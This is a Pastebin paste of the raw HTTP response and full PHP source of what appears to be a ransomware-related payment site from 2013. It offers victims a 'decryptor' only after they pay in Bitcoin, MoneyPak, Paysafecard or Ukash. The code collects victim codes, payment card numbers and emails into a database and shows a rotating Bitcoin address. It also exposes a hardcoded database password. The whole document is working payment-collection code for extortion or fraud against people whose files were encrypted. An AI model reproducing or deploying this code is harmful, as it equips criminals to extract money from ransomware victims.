Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- HTTP/1.1 200 OK
- Server: nginx/1.2.1
- Date: Fri, 20 Dec 2013 23:07:12 GMT
- Content-Type: application/octet-stream
- Content-Length: 6415
- Last-Modified: Fri, 20 Dec 2013 08:49:13 GMT
- Connection: keep-alive
- Accept-Ranges: bytes
- <?php
- session_start();
- define('DBHOST', 'localhost');
- define('DBUSER', 'site');
- define('DBPASS', 'Be6mybCWhpFpgG4u');
- define('DBNAME', 'site');
- mysql_connect(DBHOST, DBUSER, DBPASS);
- mysql_select_db(DBNAME);
- $errors = "";
- if(isset($_GET['captcha']) && $_GET['captcha'] == 1){
- include('kcaptcha6791/kcaptcha.php');
- $captcha = new KCAPTCHA();
- if($_REQUEST[session_name()]){
- $_SESSION['captcha_keystring'] = $captcha->getKeyString();
- }
- exit();
- }
- if(isset($_POST['code']) && (isset($_POST['purse']) || isset($_POST['moneypack']) || isset($_POST['paysafecard']) || isset($_POST['ukash'])) && isset($_POST['email']) && isset($_POST['keystring'])){
- if(isset($_SESSION['captcha_keystring']) && $_SESSION['captcha_keystring'] != $_POST['keystring']){
- $errors .= 'Incorrect Captcha<br />';
- }
- if(!preg_match('/^([a-f0-9]){8}-([a-f0-9]){8}$/i',$_POST['code'])){
- $errors .= 'Incorrect Code<br />';
- }
- $query = '';
- if(isset($_POST['purse']) && !preg_match('/^([a-z0-9]){34}$/i',$_POST['purse'])){
- $errors .= 'Incorrect Purse<br />';
- }
- if(isset($_POST['moneypack']) && !preg_match('/^([0-9]){14}$/i',$_POST['moneypack'])){
- $errors .= 'Incorrect MoneyPack<br />';
- }
- if(isset($_POST['paysafecard']) && !preg_match('/^([0-9]){16}$/i',$_POST['paysafecard'])){
- $errors .= 'Incorrect PaySafeCard<br />';
- }
- if(isset($_POST['ukash']) && !preg_match('/^([0-9]){19}$/i',$_POST['ukash'])){
- $errors .= 'Incorrect Ukash<br />';
- }
- if (!filter_var($_POST['email'], FILTER_VALIDATE_EMAIL)) {
- $errors .= 'Incorrect Email<br />';
- }
- if(!$errors){
- if(isset($_POST['purse'])){
- $purse = $_POST['purse'];
- $type = 0;
- }else if(isset($_POST['moneypack'])){
- $purse = $_POST['moneypack'];
- $type = 1;
- }else if(isset($_POST['paysafecard'])){
- $purse = $_POST['paysafecard'];
- $type = 2;
- }else if(isset($_POST['ukash'])){
- $purse = $_POST['ukash'];
- $type = 3;
- }else{
- exit();
- }
- mysql_query('INSERT INTO `codes` SET `time`='.time().', `type`='.$type.', `purse`="'.mysql_real_escape_string($purse).'", `code`="'.strtoupper(mysql_real_escape_string($_POST['code'])).'", `email`="'.mysql_real_escape_string($_POST['email']).'"');
- if(($error = mysql_error()) && preg_match('/Duplicate entry(.*)for key \'purse\'/', $error)){
- $errors .= 'Purse already exists';
- }else{
- $errors = 'You request was send';
- }
- }
- }
- $purse = mysql_query('SELECT `purse` FROM `codes` WHERE `code`="admin" ORDER BY RAND() LIMIT 1');
- ?>
- <!DOCTYPE html><html><head><title>index</title></head><body style="margin:20px">
- <p>
- In recent time new ransomware attack computers running Windows. When activated, the malware encrypts certain types of files stored on local and mounted network drives using RSA public-key cryptography, with the private key stored only on the malware's control servers. <a href="http://www.shadowexplorer.com/downloads.html">Shadowexplorer</a>, <a href="http://media.kaspersky.com/utilities/VirusUtilities/RU/rakhnidecryptor.exe">RakhniDecryptor.exe</a> and <a href="http://media.kaspersky.com/utilities/VirusUtilities/EN/rectordecryptor.exe">RectorDecryptor.exe</a> can't restore this files.
- <p>Victims think that files are irretrievably lost. We hasten to inform you that this is not so.
- <p> We are loud and proud to present you our unique software, which is able to decrypt all your files without prejudice .
- <p> We accept only Bitcoin. Before 2014 our software costs 0.1BTC<p>
- <b>We will send a program to decrypt only after payment is received</b><p>*IF YOU MADE A PAYMENT BUT STILL DO NOT RECEIVE UNCRYPTOR, PLEASE FILL UP A FORM AGAIN<hr>
- <div style="float:left;padding:15px;<?php echo !isset($_GET['pay'])?'border:#333 1px solid':''?>"><a href="index.php">Pay by Bitcoin (BTC)</a></div>
- <div style="clear:both;margin-bottom:10px"></div><p><hr>
- <div id="errors" style="color:red"><?php echo $errors?></div>
- <form action="index.php<?php echo isset($_GET['pay'])?'?pay='.$_GET['pay']:''?>" method="post">
- <table cellspacing="3" cellpadding="3">
- <tr><td>Code:</td><td><input type="text" name="code" style="width:200px"></td></tr>
- <?php if(!isset($_GET['pay'])):?>
- <tr><td>Your purse:</td><td><input type="text" name="purse" style="width:200px"></td></tr>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'moneypack'):?>
- <tr><td>Moneypak:</td><td><input type="text" name="moneypack" style="width:200px"></td></tr>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'paysafecard'):?>
- <tr><td>PaySafeCard:</td><td><input type="text" name="paysafecard" style="width:200px"></td></tr>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'ukash'):?>
- <tr><td>Ukash:</td><td><input type="text" name="ukash" style="width:200px"></td></tr>
- <?php endif;?>
- <tr><td>Email:</td><td><input type="text" name="email" style="width:200px"></td></tr>
- <tr><td>Captcha:</td><td><input type="text" name="keystring" style="width:100px;margin-top:30px;margin-right:10px;float:left"> <img style="width:160px;height:80px;float:left" alt="Captcha" src="?captcha=1&<?php echo session_name()?>=<?php echo session_id()?>&rand=<?php echo rand(100000,999999)?>"></td></tr>
- <tr><td></td><td><input type="submit" value="Send"></td></tr>
- <tr><td> </td></tr>
- <?php if(!isset($_GET['pay'])):?>
- <tr><td></td><td></td></tr><p>
- Our purse:<b><?php echo ($purse && mysql_num_rows($purse))?mysql_result($purse,0,'purse'):''?></b><p>
- You can read how to buy bitcoin <a href="https://localbitcoins.com/buy_bitcoins">here</a> and <a href="http://bitcoin.org/en/getting-started/">here</a>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'moneypack'):?></td></tr><p>
- <tr><td colspan="2">You can read about how to buy moneypak <a href="http://moneypak.com">here</a>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'paysafecard'):?></td></tr>
- <tr><td colspan="2">You can read about how to buy Paysafecard <a href="http://paysafecard.com">here</a>
- </td></tr>
- <?php elseif(isset($_GET['pay']) && $_GET['pay'] == 'ukash'):?></td></tr>
- <tr><td colspan="2">You can read about how to buy ukash <a href="http://ukash.com">here</a>
- </td></tr>
- <?php endif;?>
- </table>
- </form>
- <!-- hitwebcounter Code START -->
- <a href="http://www.hitwebcounter.com/" target="_blank">
- <img src="http://hitwebcounter.com/counter/counter.php?page=5220583&style=0008&nbdigits=5&type=ip&initCount=0" title="cute web counter" Alt="cute web counter" border="0" >
- </a><br/>
- *Our software don't working with Cryptolocker.<p>
- </body></html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement